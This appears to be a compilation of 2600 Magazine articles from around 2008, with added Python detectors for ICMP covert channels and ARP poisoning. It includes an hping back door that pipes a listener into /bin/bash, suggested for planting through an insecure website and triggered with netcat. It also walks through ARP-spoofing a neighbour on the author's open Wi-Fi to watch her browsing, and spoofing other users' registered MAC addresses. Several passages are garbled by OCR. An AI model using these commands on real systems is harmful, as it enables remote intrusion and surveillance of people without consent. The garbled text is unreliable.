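    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), seq, 0, 64, 1, 0,
                      bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:] + icmp

# First packet of the article's tcpdump output (IP protocol 41, no payload).
PAGE_PROTO41 = bytes.fromhex("45000014203b000040295c847f0000017f000001")
# Constructed samples; addresses are documentation ranges.
SIGNED = [build_echo("192.0.2.10", "198.51.100.5", i, b"signature" + chunk)
          for i, chunk in enumerate([b"Line 1\nLine 2\n", b"Line 3\nLine 4\n",
                                     b"End of Important File\n"])]
# Assumed shape of an ordinary Linux ping: timestamp, then incrementing bytes.
LINUX_PING = [build_echo("192.0.2.20", "198.51.100.5", i,
                         struct.pack("<qq", 1214000000, 1000 * i) + bytes(range(16, 56)))
              for i in range(3)]
# Ordinary Windows ping: the same alphabet payload in every packet.
WINDOWS_PING = [build_echo("192.0.2.30", "198.51.100.5", i,
                           b"abcdefghijklmnopqrstuvwabcdefghi") for i in range(3)]

if __name__ == "__main__":
    print(find_signed_icmp(SIGNED + LINUX_PING + WINDOWS_PING))
```

The check is a heuristic: binary or padded payloads fall under the text threshold, so payload size and per-source echo volume are worth alerting on as well.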
Let's examine the same scenario, except the location you are at only allows CUPS outbound and does deep packet inspection, so you can't re-bind your FTP or SFTP server to that port. I know this is far-fetched, but work with me on this one. You can transfer the file to your server over CUPS without interfering with the running CUPS server on the remote end:

    [root@doormouse ~]# netstat -na | grep LIST | grep 631
    tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
    [root@doormouse ~]# hping2 localhost --listen signature --safe -p 631
    Warning: Unable to guess the output interface
    hping2 listen mode
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    Line 1
    Line 2
    Line 3
    Line 4
    End of Important File

The command to send the file over TCP with no flags looks like this:

    [root@doormouse temp]# hping2 localhost -p 631 -d 100 --sign signature --file ./random.stuff
    HPING localhost (lo 127.0.0.1): NO FLAGS are set, 40 headers + 100 data bytes
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=631 flags=RA seq=0 win=0 rtt=0.0 ms

Keep in mind that files transferred this way are not encrypted. Although most people won't be inspecting packets that much, anyone snooping on the wire can grab your information.

You can also use HPing as a back door. Get the following command running on a remote host, possibly through an insecure website with an unchecked input variable: hping2 -I eth0 --listen signature -p cO | /bin/bash. Then, use netcat to do something like this: echo "signaturereboot;" | nc . 4 4 4 . O . O O O c O. Anything after the word "signature" in the echo command will be processed by the /bin/bash to which HPing's output is being piped, and so the server reboots. Try this with your own machines: use signaturetouch remote.touched.file; to see that the listener will process what is being asked of it. You won't see anything on the console, but when you stop HPing and do a quick ls, you should now see a new file called remote.touched.file in the current directory.

Another use for this technique is as a "port knocker." If you don't want to leave your SSH daemon up and running all the time, set up HPing on your SSH server. Whenever you want to start your SSH daemon, use the command signatureservice sshd start;.

Conclusion

As you can see, HPing is a great tool for both basic and more advanced applications, and it can be used in a variety of different ways. It's excellent for helping people to learn how the IP stack works, especially the TCP flag settings, and it's great to use in or along with custom applications. The topics I've covered here in this article are just the beginning, and I strongly urge you to become familiar with this powerful tool.

Shouts: magikhOe, Ihab, Exial, JohnPNP and, of course, eXoDuS. (YNBABWARLf)
by Sai Emrys
2600@saizai.com
AIM, #ca2600: saizai
GPG: 0xAFF1F292

My experience has been that meditation is a subject that frequently polarizes people: some believe credulously in all kinds of unsupported nonsense, while some reject everything wholesale in the name of skepticism.

However, meditation is a useful way to hack your mind state. Rather than just taking some guru's preferred version of one technique as the One True Way, you just have to get to know a variety of the techniques available, tweak them to work for your own world-view and symbol set, and understand what about them makes them actually work.

I've talked with a fair number of people about this, and one misconception that comes up often is that "meditation" exclusively means "sitting in a dark, quiet room in lotus position smelling incense and thinking about nothing." This is indeed one method of meditation, known as mushin or "empty mind." It is far from the only one, though, and it's not necessarily the best first approach for everyone, especially not for people used to multitasking, like most hackers.

Another misconception is that meditation is to be treated as something that you do only in special short periods of time. This implies that most of the time you are not in a meditative mind state, but the whole point of meditation is to change your everyday life.

There certainly is a place for separate, focused meditation, but here is one class of methods I call "all-point" techniques. What makes this class of methods work is the combination of a very rich environment and the strategy of not concentrating overly on any particular piece of it. These methods are particularly well-suited to beginning one's meditation experience and to easy, everyday practice.
1. "Soft eyes"

This is a relatively common technique in martial arts.

Instead of focusing on the eyes or hands of the person you are talking with (or trying to disarm), aim your eyes towards the neck area and keep a soft focus, both mentally and literally.

A good way to check this technique is to ask yourself a series of questions:

    Where is their right hand and what are they holding?
    What is in their pockets? (Pants, chest, under-arm holster, buttocks...)
    How tense are the muscles around and above their eyes? Shoulders? Neck?
    How fast are they breathing?
    How are they about to move?
    Who and what is nearby? Where is the nearest exit?

The way to tell whether you're doing this right is to see if you can answer all of these questions with only minimal, if any, movement of your eyes and attention; you should be able to see all of it simultaneously.

This is not an exclusively martial technique, though it's certainly useful for that; try just doing it with everyone you see. The point is to be able to notice as much as possible, without telegraphing what you are looking at and without having your attention exclusively focused on one thing. Magicians and fighters both like it when they can use misdirection to make you not notice things which are within your sight.
2. Really enjoying nature

Go somewhere you'll find beautiful. I'll use hills as an example since that's what I most enjoy, but anything vibrant will work.

Normally, when most people go to "enjoy nature," they either barely notice it at all because they're distracted by equipment, their latest argument, planning the next day's work, etc.; they notice one spotlighted bit at a time; or they notice only a very vague ambiance.

Instead, try to individually see everything in detail.

An easy way to do this is to start by limiting your attention to two things; for example, feeling wind on your skin and seeing the clouds move. See as much detail as you can in those two things. Then add a third, such as the feel of sunlight or the movement of a patch of grass nearby.

The key lies in adding more things to your attention simultaneously without losing detail in the previously perceived ones. This can very quickly become overwhelming; the amount of information in any natural scene is extremely dense. Even a small patch of grass will have enough movement and detail in it to swamp your multithreading.

Fortunately, this is a learnable skill. With practice, you'll find that your effective threadcount and buffer size go up.

As a nice bonus, the more you can really notice, the more enjoyable it is.
3. Individuals in crowds

What did you notice the last time you walked down the street?

It's interesting that the amount you relate to people as individuals tends to be inversely related to the number of people present. Crowds gain a separate character of their own: it's easier to simply interpret them as a mass. This is also true in reverse; being a member of a crowd makes one less apt to empathize with others as individuals. Look up the case of Kitty Genovese for one sad example.

Next time you are out, try to notice faces, body posture, and the distances people stand from each other, rather than glazing over. Don't attach too much to each personal drama; just notice, recognize, and keep moving.

The goal for this is to increase the scope of things which you can take in consciously, making a "mere" walk down the street a somewhat more alive experience. For more on recognizing facial emotions, I highly recommend the work of Paul Ekman, and for more on the significance of proximity in human interaction, I recommend The Hidden Dimension and The Silent Language, both by Edward T. Hall.
Conclusion

There are many other situations in which you can practice this "all-point" technique: while playing RTSs and other games with lots of things happening at once; while listening to complex multi-part music such as Rachmaninoff, Bach, or Godspeed You! Black Emperor; while noticing all the background sounds wherever you are, including computer fans, hard drive clicks, traffic, your own breathing, radios, neighbors, and so on; or while experiencing any environment.

The purpose of this class of techniques is to learn to be able to deal with highly multithreaded, content-rich, real-time situations in a serene manner, so you can not only experience as much of these situations as possible but also do so without being overwhelmed. This is a lot like the eventual purpose of traditional empty-mind meditation; it's just a different approach. I've given just a few ways of doing this. It's up to you to figure out one that'll be effective for you in your daily life. The more that you can integrate this way of interacting with the world as a daily habit, the more effective it'll be at shifting your baseline mind state.

If you have any feedback on this or are interested in seeing more, please contact me. I'm working on a book tentatively entitled A Hacker's Guide to Meditation: Practical Recipes Without the Dogma, which aims to be a complete guide to all known classes of effective meditation techniques - of which this article discusses just one - from a pragmatic, open-source perspective. This includes techniques traditionally taught as meditation, psychotherapy, and more. If you find this useful, or if you have a technique or variant I might not have heard of, I'd like to know.

Happy mind-hacking!

Sai Emrys is a recent graduate of UC Berkeley in cognitive science, looking to do doctoral work in the neuroscience of empathy. Other interests include running the Language Creation Conference (conlangs.berkeley.edu), interpreting music in American Sign Language (YouTube saizai), coding in Ruby on Rails, and consulting on international business.
by Uriah C.
I enj oy l eavi ng my wi rel ess access poi nt
ava i l abl e for others to connect to and use t he
I nternet. There i s one cat ch, however: I get t o
pl ay and moni tor t he traffi c whenever I want
t o. I n t hi s arti cl e, I wi l l descri be a past i me
t hat i s fu n and reveal i ng of your nei ghbors.
I recent l y fou n d a new host on my network
to pl ay wi t h. New fri ends are fun ! I frequent l y
use EtherApe to qu i ckl y moni tor my n etwork
traffi c, and I fou n d a new computer name
on my network. Knowi ng t hat t h i s person
was on my network, I fi red up n map to do
a qu i ck pi n g sweep to confi rm my new
fr i end. My new fr i end ' s computer name was
her rea l name, and I cou l d see t hat s he had
t he I P address of 192 . 168. 1.104. The fami l y
computer was on 192. 168. 1. 103, my l aptop
was on 192 . 168.1. 101, and the access poi nt
was on 192 . 168. 1. 1.
Si nce I had a new fri end to p l ay wi th, I
deci ded to vi ew t he traffi c that was goi n g
through. Of course I cou l d do that wi t h
EtherApe, but I wanted more t hen j u st I P
addresses a n d URLs. Besi des, I was i tch i ng
to use t he program webspy for a l i ttl e bi t .
Before I go i nto t he fun t oo much, l et
me expl a i n what webspy i s . Webspy i s a
program t hat i s part of Doug Song' s ds ni ff
s u i te. These tool s are desi gned to penetra
t i on test your n etwork, and, i n my case, h ave
fun wi th those on my n etwork. I mu st stress
that t h i s s houl d on l y be done on your own
network or on one that you have been given permission to perform such tests. Now that the legal stuff is out of the way, let's get on with the fun.

The first thing I have to do is to ARP poison the host and the gateway. This way, the traffic will be routed to my computer. This is done by opening two terminal windows.

In the first terminal, type:
# arpspoof -i eth1 -t 192.168.1.1 192.168.1.104

In the second terminal, type:
# arpspoof -i eth1 -t 192.168.1.104 192.168.1.1

Then, I need to make sure that I am forwarding traffic to the proper locations, so I use fragrouter. In a third terminal, type:
# fragrouter -i eth1 -B1

Now let's see what this does. The first arpspoof command sends forged ARP information over the interface (-i) eth1 to the target (-t) 192.168.1.1 that my computer is 192.168.1.104, while the second terminal tells the target 192.168.1.104 that my computer is 192.168.1.1. Meanwhile, fragrouter sends the broadcast address (-B1) all traffic that has come in, so there is no interruption of service.

Now, it's time for the last few steps. I need to run webspy and open a browser. Then, I can have the fun of seeing whatever someone else sees. So, I would open up two more terminals. In the fourth terminal, type:
# webspy -i eth1 192.168.1.104

And, finally, in the fifth terminal, type:
# firefox

Now, Firefox opens up, and I get to see the websites that my new friend opens up in real time. I've only seen one problem: if an ad pops up on a separate page from the rest of a website, it'll be shown separately from the rest of the original site. So, if my friend goes to MySpace, then I see MySpace, but it quickly flashes over to show just the ad without the rest of the site. I have my browser set to open these ads in different tabs, so I can see the page and the ad.

You never know what kind of sites others may visit, so you should do this with discretion especially if the kids are running around the house and the material coming up is questionable.
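Seen from the defending side, the poisoning described above leaves a clear trace: the gateway's address and the host's address both start answering from one MAC address. The detector below is an added example, not code from the article; the record format, the MAC addresses and the third machine 192.168.1.50 are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample of observed ARP replies, one per line:
#   "<seconds> <sender IP> is-at <sender MAC>"
# 192.168.1.1 (gateway) and 192.168.1.104 (host) are the article's addresses;
# the MAC addresses and the machine 192.168.1.50 are invented for this example.
SAMPLE_REPLIES = """\
1.0 192.168.1.1 is-at 00:1a:2b:00:00:01
1.2 192.168.1.104 is-at 00:1a:2b:00:00:68
1.5 192.168.1.50 is-at 00:1a:2b:00:00:32
9.0 192.168.1.1 is-at 00:1A:2B:00:00:32
9.1 192.168.1.104 is-at 00:1a:2b:00:00:32
11.0 192.168.1.1 is-at 00:1a:2b:00:00:32
11.1 192.168.1.104 is-at 00:1a:2b:00:00:32
12.0 192.168.1.1 is-at 00:1a:2b:00:00:01
this line is malformed and is skipped
"""


def parse_replies(text):
    """Turn record lines into (time, ip, mac) tuples, skipping bad lines."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "is-at":
            continue
        try:
            ts = float(parts[0])
        except ValueError:
            continue
        records.append((ts, parts[1], parts[3].lower()))
    return records


def detect_arp_poisoning(records, pinned=None):
    """Return alerts as dicts with the keys time, kind, ip and mac.

    pinned is an optional {ip: mac} map of known-good bindings, normally
    just the gateway. Legitimate events (a replaced network card, a DHCP
    address handed to a new machine) also change bindings, so the pinned
    check is the strongest of the three signals.
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    current = {}                # ip -> MAC most recently claimed for it
    claimed = defaultdict(set)  # mac -> every IP it has claimed so far
    reported = set()            # suppresses repeats of the same finding
    alerts = []

    def alert(ts, kind, ip, mac, key):
        if key not in reported:
            reported.add(key)
            alerts.append({"time": ts, "kind": kind, "ip": ip, "mac": mac})

    for ts, ip, mac in sorted(records):
        # 1. A pinned address answered from a MAC other than the pinned one.
        if ip in pinned and mac != pinned[ip]:
            alert(ts, "pinned-mismatch", ip, mac, ("pin", ip, mac))
        # 2. The binding for an IP changed between two replies. The flip
        #    back when the real owner answers is reported as well.
        old = current.get(ip)
        if old is not None and old != mac:
            alert(ts, "binding-changed", ip, mac, ("chg", ip, old, mac))
        current[ip] = mac
        # 3. One MAC now answers for more than one IP address.
        claimed[mac].add(ip)
        if len(claimed[mac]) > 1:
            alert(ts, "mac-claims-many-ips", ip, mac, ("many", ip, mac))
    return alerts


def suspect_macs(alerts):
    """MAC addresses that impersonated a pinned or a second IP address."""
    kinds = {"pinned-mismatch", "mac-claims-many-ips"}
    return {a["mac"] for a in alerts if a["kind"] in kinds}


if __name__ == "__main__":
    gateway = {"192.168.1.1": "00:1a:2b:00:00:01"}
    for a in detect_arp_poisoning(parse_replies(SAMPLE_REPLIES), gateway):
        print("%5.1f  %-20s %-15s %s" % (a["time"], a["kind"], a["ip"], a["mac"]))
```

A static ARP entry for the gateway on each host, or dynamic ARP inspection on a managed switch, prevents the forged replies from taking effect in the first place.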
Page 24 2600 Magazine

Hacking: A Graffiti Writer's Perspective
by scOut64
scOut64@yahoo.ca

I find that one of my longest-running fascinations, computer hacking, has a lot to do with my greatest passion and hobby, graffiti art. These are two very controversial subjects, and discussing them can usually generate a great response, depending on who you ask. This is not a how-to article by any means, but rather a way to shed some light on the similarities between two of my favorite pastimes. But I'll still include the standard disclaimer that getting caught participating in either of these activities might get you in trouble.

The first thing I can find these two subjects have in common is the reaction that you get when you tell someone that you do one or the other. If you tell someone you're a computer hacker, you can usually expect confused or wary looks. People assume that you've done shady things before, and they approach conversation choosing their words carefully, assuming that you might take some of the information and use it against them. They might not be aware that the hacking you do might be completely legal. You might be a pen tester for a security firm, or you just might like running wargames on your network with your friends. It depends on your definition of a hacker.

Similarly, when you tell someone that you're a graffiti artist, some people automatically assume that you're a vandal. They think you're one of those stereotypical guys who tags up convenience stores at night, or that you're one of the people who vandalized all those New York City trains years ago. They might think that your bedroom is a mess and that all your school books are scribbled on. They may not realize that there are plenty of legal areas to tag up and that what you do falls completely within the law, or that you might be a graphic design student whose style is completely digital. It depends on your definition of graffiti.

Another similarity between these two areas is legality. Graffiti writing really came into popularity in the 70s and 80s in New York City. Yes, it caused all kinds of chaos, and many people were penalized once the city implemented graffiti laws. Like many great things, because it was new and brought change, people didn't like it. Likewise, when hacking started becoming extremely popular, there were no laws or governing bodies to regulate what went on. With these two cultures and many others, once the government felt things got a little too out of control, they stepped in and "supervised."

There are a number of other similarities between the two fields:

- Some ways of participating in these activities are illegal and carry penalties of various kinds.
- You need permission for participation to be legal. You can't just 0wn your friend's b0x any more than you can tag up his room; you need to have an OK from him first.
- There are contests. These are great for intellectual stimulation, learning, meeting new people, and challenging yourself.
- There are a lot of graffiti-based themes in computer hacking and in video games. Clan tags and sigs have gotten very, very cool.
- Depending on who you ask, both can be considered either vandalism and crime or art and expression.
- An interest in either field can lead to a great career.
- Sometimes, both practices involve going places you're not supposed to go.
- Sometimes, you have to come back to the same places to finish what you started.

There are more similarities, but you get the idea. Graffiti and hacking have evolved into distinct cultures; just like every culture, you have good people and bad people. People come and go, but the culture survives. Legal or not, these activities will still go on. The question still remains: how will you represent your culture?

Shouts: Adict, Kiwi, www.worldwideblackbookproject.com

Summer 2008 Page 25
Hacker Perspective
Barry Wels

The story below is my youth confession. In a way I am a little reluctant to tell it, but since it is a story over 20 years old... I just hope you will see it in its rightful perspective.

Normally when people ask where my interest in locks and lockpicking comes from, my answer is that I became fascinated watching James Bond movies as a kid, wondering if locks really could be opened that simply. Now that in itself is a true statement. But the one thing that really seriously motivated me, and made me put a lot of creative energy into locks and circumventing some security features, was something else....

As long as I can remember, I was interested in locks and ways of opening them. And as a kid, I was eager to learn all the "tricks from the street" to open bicycle locks, often using simple tools like filed down scissors or other flat and thin pieces of metal. Still, I can honestly say I never stole a bike in my life. But I just had to know and test the tricks on how to open these locks. The real challenge came at around age 17. A friend of mine, who was a graffiti artist, had access to a very special key: a master key to the Amsterdam subway.

This highly restricted key would open any door in the entire Amsterdam subway system. This included the nuclear shelters that are deep underneath some of the stations. In particular, the entrance to the nuclear shelters was rather spectacular.

The best way to get into the shelters was to take the elevator that would normally bring you from street level to the subway platform. The only difference is that instead of pushing the elevator buttons you would insert the key in the keyhole just below the buttons and turn it. Now the elevator would not stop at the platform level but instead would go much deeper until reaching the shelters. I must say it was quite a thrill going deeper underground than most people knew was possible - not to mention the spooky atmosphere in the shelter. Deep below the subway station were hundreds of packaged bunk beds and many weird machines and other interesting things.

Needless to say this master key had a magical attraction to me. I just had to get a copy of it! And even though my friend told me he had already tried to get it copied and had concluded that it was truly impossible, I knew I could do it.

I quickly learned that even though the key looked like a standard key, it had several copy protection features. And instead of the standard five pins, this one had seven. The key profile was highly restricted, meaning only the factory had blank keys for it. Besides the blanks not being available, the key also had two "wings" or "ribs" that operated pins on the left and right side of the lock. For its time, this was one of the best high security locks on the market and its keys were known to offer the highest degree of copy protection.

But determined and challenged as I was to somehow get a copy, I decided to compile a list of locksmiths from the Yellow Pages and pay them all a visit to see if they could copy the key. After all, locksmiths are the people with knowledge on copying keys, and it must be possible to find one that could do it? Unfortunately, most visits did not last long. In general, the locksmiths all looked at me real funny when showing them the key. Some of them took the effort to explain that they simply did not have a blank key for it, while others just said "no" and pointed me to the door. Instead of giving up, I learned a little from each visit and was able to ask more to-the-point questions at my next visit.

Finally, after at least 20 visits, I found a locksmith that did not send me off straight away. This locksmith was very curious about what the key was for and I decided to be open with him. So I started explaining that I had no criminal intent with this key. If I had, I would have used it right away and not bothered to copy it. And I told him it was the top master key for the Amsterdam subway. I explained to him that by now I had become sort of obsessed to copy this "uncopyable key" and that I was determined and would succeed one way or another. After all, technically it is just an odd-shaped piece of metal.

After thinking it over, he said he could help me a little bit. He studied the key for quite some time and started comparing it with some blanks from his racks. In a few minutes he came up with a blank key that more or less had the same profile as the master key, except it did not have wings. And he made it very clear that he would not help me with the wings; I was on my own for that part. The blank he found was a little fatter than the original, meaning it had more material on it than the master key and would not yet fit the lock. The locksmith advised me to get a fine file and try to file or grind away some of the metal in strategic places until it was slim enough to fit the target lock. He made me three keys and was kind enough to already copy the normal seven cuts of the master key on them. I was now getting somewhere!

At home I studied both the original and the "fat" copy for a long time and determined three positions where I would have to remove material from the copy. After spending 30 minutes with my file, I ended up with a relatively thin key that I figured would fit the subway locks.

The next day I went to the subway to give it a try, and somewhere in a dark corner I inserted the key into one of the many maintenance locks. These locks normally just cover power outlets used by cleaners or workers and sometimes are not used much at all. To my surprise the key entered smoothly and ... turned!

However, this euphoric moment did not last long. As I turned the key 90 degrees, the lock stopped and the key got stuck! No matter how I tried, I could not turn the key left or right, nor get it out of the lock. I panicked and came close to the point of breaking off the head of the key and just going home. But after I calmed down a little and started to analyze the problem, I came to the conclusion that the missing side wing(s) was probably the reason for the lock jamming. So I started looking around for something thin to poke the side channel of the lock. I ended up with a bent paper clip (or was it a needle?) that, to my great relief, allowed the lock to turn back to the original position where I was then able to take the key out again.

Phewwwww.

Back home I tried to think of a way to somehow create wings on the key. I tried to solder them on using a soldering iron. One of the first problems was that if I soldered a wing on one side, it would come loose when trying to solder one to the other side. The second problem was that the lead was not strong enough to support the thin small wings even when I managed to solder them on correctly. The key simply was too fragile and not usable this way. So I had to think of something else.

I had some good contacts with an optic shop, and one of the opticians showed me how they repaired broken metal frames. They used a technique called hard soldering. With hard soldering you use a gas flame to heat the object and solder the parts together using thin silver or gold sticks. When done properly, you do not even notice the frame has been repaired. I realized I had to learn and master this hard soldering technique, and I asked if they could teach me. It took me some time, but finally I managed to master the hard soldering technique. And I was finally ready to solder wings on my key....

Still, I had the same problem as with lead solder. If one rib was fixed, it came loose when I tried to solder the other side. The solution was to use two different kinds of soldering material. One type would melt at a high temperature, the other at a low(er) temperature. My first experiments were soldering one rib using silver through the hard solder method (high melting point) while for the other rib I used a soldering iron and lead-based solder (low melting point). Later I mastered the hard solder technique even better so I could solder one side of the key with silver solder (high melting point) and the other side using gold solder that had a slightly lower melting point.

And now, two years after seeing the subway key for the first time, I was ready for the final test. I went back to the same dark corner of the subway system and tried my key. And it worked like a charm. I could not have been happier.

Truth is I never used it much. For me the challenge was to copy the key. But some of my friends had great fun with it. In the early 90s we were known as the unofficial tour guides of the Amsterdam underground, proudly showing all our (international) friends the Amsterdam nuclear shelters.

But the story continues....

After some exploring, my friends told me they found a few doors deep inside the system that this master key could not open. It could enter the lock, but not turn. This was a new challenge.

At about the same time we met a group of artists who were officially allowed to give an art performance inside the subway system. They had been given a very low priority key that could only open two doors in the entire subway system. And even though we could already open these doors with our own master key, I was still eager to examine this low priority key. Comparing the two keys I found they were almost identical. On just two out of seven positions the keys differed. I did not expect much of it, but decided to combine both keys and cut the remaining two combinations. To clarify this: if you have two different values in a key system, you can make four keys. Let's say the master key had a cut depth 2 and 3 on the positions that differed. And let's say the low priority key had a cut 4 and 5. The remaining two combinations would be a key cut to 2 and 5, and one cut to 4 and 3. To this day I still don't know why I cut these extra keys. I guess I was just curious. And I did not have high hopes it would open anything more than the locks we could already open. So I never bothered to solder wings on these two experimental keys. I just added them to my key ring.

The next time I was present at one of the underground tours, we ended up at the doors we could not open. Only then I remembered the experimental keys I made, and gave them a try. And guess what? One of them worked! Now that was a truly euphoric moment! And I immediately realized I had better not try to fully rotate the key as it did not have wings yet. So after turning it ten degrees, I went back to the original position and removed it from the lock.

I soldered on wings the same day and found that the key worked really well. (As to be expected behind the door there were just some more maze tunnels and some high voltage equipment you do not want kids playing around in.) We called it the "super master key" as we never found a lock it could not open in the entire Amsterdam subway system. And it took some time to realize what I had achieved. I made a copy of an uncopyable super master key, of which I had never seen the original key. I was root at the subway system, and it earned me my nickname "The Key."

Now there is a reason for this confession. First of all, I just turned 40, and figured an over-20-year-old story could be told by now. The second reason is to show you that no matter how sophisticated a mechanical lock is, it can always be bypassed by a determined attacker. And the final reason is that it's a nice introduction to my presentation at The Last HOPE conference. The title of the presentation will be "Methods of Copying High Security Keys." And it will cover many more modern techniques than this 20-year-old story.

I hope to see you there, and urge you to bring your uncopyable mechanical keys for us to evaluate.

Barry Wels is president and founder of Toool, The Open Organisation Of Lockpickers. Toool's expertise, integrity and publications are well received in the lock industry and Toool is often requested to do tests for lock manufacturers and organizations such as Dutch Consumer Reports. He runs a weblog at http://www.toool.nl/blackbag.
A Portable Encrypted Linux System for Windows

by Aaron

Using TrueCrypt along with DamnSmall Linux (DSL), it is possible to create a portable encrypted GNU/Linux work environment which you can take with you from PC to PC. As I have lost a number of USB drives, I find that having the data on them be encrypted by default provides some peace of mind.

The basic concept here is to use TrueCrypt to encrypt the majority of a USB drive. Inside the encrypted volume will be DSL along with QEMU, which allows the Linux installation to be run on a Microsoft Windows machine.

Steps

1. Install TrueCrypt on your PC. You can run TrueCrypt without installing it; this is called "traveler mode." For the purposes of this example, though, it is assumed that TrueCrypt is installed locally on your PC. Download TrueCrypt from http://www.truecrypt.com; then, extract and run the setup.exe program.

2. Make a TrueCrypt volume on the USB drive. Insert the USB drive and wait for the system to recognize it. For this step, we are going to create an encrypted volume. In TrueCrypt, select "Volumes -> Create New Volume", which will fire up the Volume Creation wizard. Select "Create a standard TrueCrypt volume," and hit next. Select "File" and create a file on the USB drive. Take the defaults for Encryption Algorithm and Hash Algorithm, and hit next. In the next dialog box, set the size of the volume; typically you can choose an amount equal to the size of the drive, subtracting 20 megabytes for the TrueCrypt traveler volume. It will then ask you for a volume password; be sure to remember this or you will never be able to access this volume again. Enter the password, and hit next. It will then begin to format the volume. After this, you will have an encrypted volume on your USB device.

3. Install TrueCrypt Traveler mode on the USB device. The next step is to install TrueCrypt Traveler mode on the drive. To do this, go to "Tools -> Traveler Disk Setup" in the TrueCrypt program. This will take you to a setup screen. Select the drive letter for the USB drive. Select "Auto-mount TrueCrypt volume (specified below)" from the AutoRun configuration section. Then, select the encrypted volume in the "TrueCrypt volume to mount" section. Then, hit "Create."

4. Test the TrueCrypt volume. Safely remove the drive and reinsert it. You should get the TrueCrypt prompt asking for the volume's password. After that, the drive should be mounted as the next available drive letter. If this works, we should be ready for the next step.

5. Install DSL on the encrypted volume. Download dsl-embedded from the DamnSmall Linux website, http://www.damnsmalllinux.org. Unzip the contents to the encrypted volume.

6. Create a hard drive image for DSL. Follow the directions in the readme file included with dsl-embedded to "Create a QEMU Virtual Hard Disk and use the dsl-vhd.bat file." Fortunately, this only has to be done once per USB drive.

7. Test the DSL configuration. Safely remove the drive and reinsert it. You should get the TrueCrypt prompt asking for your password. After you enter that, an explorer window should pop up. Select dsl-vhd.bat, and you should be off and running.

Caveats

TrueCrypt running in Traveler mode will leave behind evidence on the PC that it has been run and that a volume has been mounted.

TrueCrypt running in Traveler mode requires administrator privileges to be able to mount drives. This is a limitation in the way Microsoft Windows handles devices. If you install TrueCrypt on the system, then you can set it up so it doesn't need administrator rights to run.

Cleanly shutting down the DSL environment is a good idea. Not shutting it down correctly can lead to file corruption problems in the additional save space.
If you want to save anything, you have to save it to the /mnt/hdb directory. You will need to be root to be able to save data here. To change this, open a root shell by choosing "XShells -> Root Access -> Dark" and typing chmod O /mnt/hdb into the window that pops up. After that, you will be able to save documents to the /mnt/hdb filesystem and have them preserved between boots.

Options

Note that the method presented here is merely one way to build a portable encrypted environment.

FreeOTFE can be used in place of TrueCrypt. One of the advantages of FreeOTFE over TrueCrypt is that Linux can use dm-crypt to read FreeOTFE volumes, instead of installing TrueCrypt on a Linux box.

Another distribution of Linux can be substituted for DSL. For example, nUbuntu can be used to create a portable security toolkit, or Knoppix can provide a more fully featured Linux distribution. Using Bart's PE, it is even possible to create a version of this project which runs Microsoft Windows instead of Linux.

You can use an SD card, a memory stick, or a portable hard drive instead of a USB drive to hold the environment. Many systems now come with SD card readers, and some currently don't disable them. A first-generation Apple iPod shuffle makes a wonderful way to carry the environment around with you.

TrueCrypt has many additional options, such as hidden volumes and stronger encryption algorithms. Visit the TrueCrypt website for more information.

DSL has optional packages, such as tor, which can be used to create a more secure browsing environment.

Links

DamnSmall Linux (DSL): http://www.damnsmalllinux.org
TrueCrypt: http://www.truecrypt.org
QEMU: http://www.qemu.org

Mac Address Changer

by Plasticman

As a college student, a hacker, and an all around semi-paranoid person, I recently became obsessed with protecting my personal privacy and security. At my university, whenever a user connects a new computer to the network, they must log in with their Unique ID. After this login procedure, the MAC address of the user's network device is registered with the network under their name. Now, as a sysop, I fully understand the necessity and benefits of this sort of registration procedure. However, as I also enjoy my privacy, I would prefer that nobody has the ability to see what I am doing on any network.

The key to being able to get around this type of logging is noticing how the network devices are associated with users: the MAC address. Changing your MAC address is a simple task on any system, but the problem is that you have to re-register yourself whenever you change it, putting you back at square one. So, in order to maintain our privacy, we must build a list of MAC addresses that are already registered on the network under different users. The tool I used for this was nmap, which is a free open-source port scanner available for both Unix and Windows systems. I won't go into the details on how to use nmap; instead, you can look at www.insecure.org, which is a great resource about proper use of this tool.

After I built my list of MAC addresses, I wrote a bash script which will shut down my network device, pick a new MAC address at random out of that list, assign it to my network device, and start it back up. The script also has the ability manually to assign a MAC address, and to restore my original MAC address as well. The purpose of this script was for me to conceal my own network uses; as with all things, though, there are both good and evil uses. I do not condone the use of this script in illegal activities, as it could potentially get an innocent person in a lot of trouble. The script is available from the 2600 code repository.
Capturing Botnet Malware Using a Honeypot

by LOjlk
IOjlk@IOPk.net

I'm going to show you how to set up a honeypot to capture malware, but first a few ground rules. This article is not to be interpreted as a how-to about creating or hijacking botnets. This article is also not to be interpreted as anything but a bit of information. As such, I can't be held liable for how you use the information. If you don't know about botnets, do a simple search on Wikipedia. That should get you started. I have changed the names of IRC channels, nicks, and forums, as well as the IP addresses for IRC servers, as they aren't needed to show the methodology. Please keep in mind that people make mistakes; I am not perfect. Also, there are five hundred million ways or more to do the things described in this article; this is just one of them. DDoSing my site won't make your bots better. If you see me online, say hi. On to the article.

In a perfect world, you would have a connection to the internet that isn't through a carefully supervised network, and most lenient commercial ISPs offer this kind of connection. You are pretty much out of luck on military bases and in most hotels, but you never know! There are a number of arguments for using either a physical machine or a virtual host for your honeypot. For example, it's possible for software to detect the use of virtualization environments like VMware. Some botnets may be programmed not to infect a host on a virtual machine. Also, cross-contamination to your physical machine could occur. However, using a virtual machine allows you to restore your honeypot to a pristine install with a simple click of the mouse. This article is written to be independent of the choice you make in this regard. Whichever route you go, be prepared for the possibility that all the data on the machine hosting the honeypot and on any other machine on the same network will get hosed by some retarded exploit.

